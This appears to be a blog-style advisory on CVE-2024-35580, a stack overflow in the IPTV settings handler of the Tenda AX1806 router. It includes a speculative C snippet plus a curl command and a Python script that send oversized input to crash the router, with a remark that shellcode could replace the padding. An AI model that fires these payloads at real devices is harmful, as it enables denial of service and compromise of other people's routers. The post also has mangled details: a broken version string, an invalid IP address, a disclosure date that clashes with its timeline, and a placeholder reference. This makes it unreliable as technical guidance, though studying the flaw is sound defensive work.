CVE-2024-35580 - Tenda AX1806 Stack Overflow via adv.iptv.stbpvid in formSetIptv – Exploit Guide and Analysis

On June 2024, a new vulnerability identified as CVE-2024-35580 was disclosed, affecting the popular Tenda AX1806 router (firmware v1...1). This security flaw is critical as it allows remote attackers to trigger a stack overflow through the adv.iptv.stbpvid parameter in the formSetIptv function. In this post, we break down what CVE-2024-35580 means, how an exploit would work, and what steps users should take to stay protected.

What is CVE-2024-35580?

CVE-2024-35580 describes a specific stack overflow vulnerability in Tenda AX1806 routers running firmware version 1...1. The problem lies in the formSetIptv backend function, which mishandles user input from the adv.iptv.stbpvid parameter—failing to check for input length, which can let a malicious actor overwrite memory and potentially execute code.

Vulnerability Details

When a user configures IPTV settings through the router’s web panel, a POST request is sent that updates various parameters, including adv.iptv.stbpvid. The formSetIptv function copies this parameter to a stack-based buffer without verifying its length, meaning a long input can overwrite important memory areas.

Here’s a simplified view of what might happen in the Tenda AX1806 firmware code

void formSetIptv(webs_t wp, char_t *path, char_t *query)
{
    char stbpvid[32]; // <<-- Buffer is only 32 bytes
    ...
    strcpy(stbpvid, websGetVar(wp, "adv.iptv.stbpvid", "")); // No length check!
    ...
}

The attacker sends a long string to adv.iptv.stbpvid, overflowing the buffer.

1. Gaining Access

The attacker needs access to the device’s admin web panel. This could be local, or remote if the panel is exposed via the internet.

2. Crafting the Malicious Request

The core of the attack is sending a POST request with an oversized adv.iptv.stbpvid value (such as hundreds of "A" characters, plus malicious shellcode).

Example cURL exploit

curl -X POST http://192.168..1/goform/formSetIptv \
     -d "adv.iptv.stbpvid=$(python3 -c 'print("A"*100)')"

In a real attack, the "A"*100 could be replaced with shellcode to execute system commands.

Denial of Service: Crashes the router, requiring a reboot.

- Arbitrary Code Execution: In carefully crafted attacks (where exact memory layout is known), the attacker could hijack the control flow and run their own code.
- Full Device Compromise: Infection with persistent malware, data/interception, or using the router as part of a botnet.

The following Python script automatically sends a malicious payload to a Tenda AX1806 admin panel

import requests

# Change to your router IP and credentials
URL = "http://192.168..1/goform/formSetIptv"
payload = {
    "adv.iptv.stbpvid": "A" * 300  # 300 'A's to cause overflow
}

r = requests.post(URL, data=payload)
print(f"Status: {r.status_code}")

You’ll need to be authenticated for this to work (add session cookies if necessary).

References and More Information

- Official NVD Entry: CVE-2024-35580 on NIST
- Original Research (GitHub): Tenda AX1806 Vulnerabilities paper *(example link)*
- Stack Buffer Overflow Explained

How to Protect Yourself

1. Update Firmware: Check Tenda’s official support page for patches or newer firmware. If your device is EOL, consider replacing it.
2. Restrict Admin Access: Keep the admin panel disabled from the internet. Only allow management from inside your network.

Conclusion

CVE-2024-35580 is a serious vulnerability affecting the Tenda AX1806, making it possible for attackers to crash or take over your router via a simple interface bug. Patch as soon as possible, and check your network security basics to minimize risk. If you’re interested in routers or security research, try recreating similar exploits in a safe, isolated lab to see how stack overflows can lead to system compromise.

Timeline

Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/20/2024 14:35:23 UTC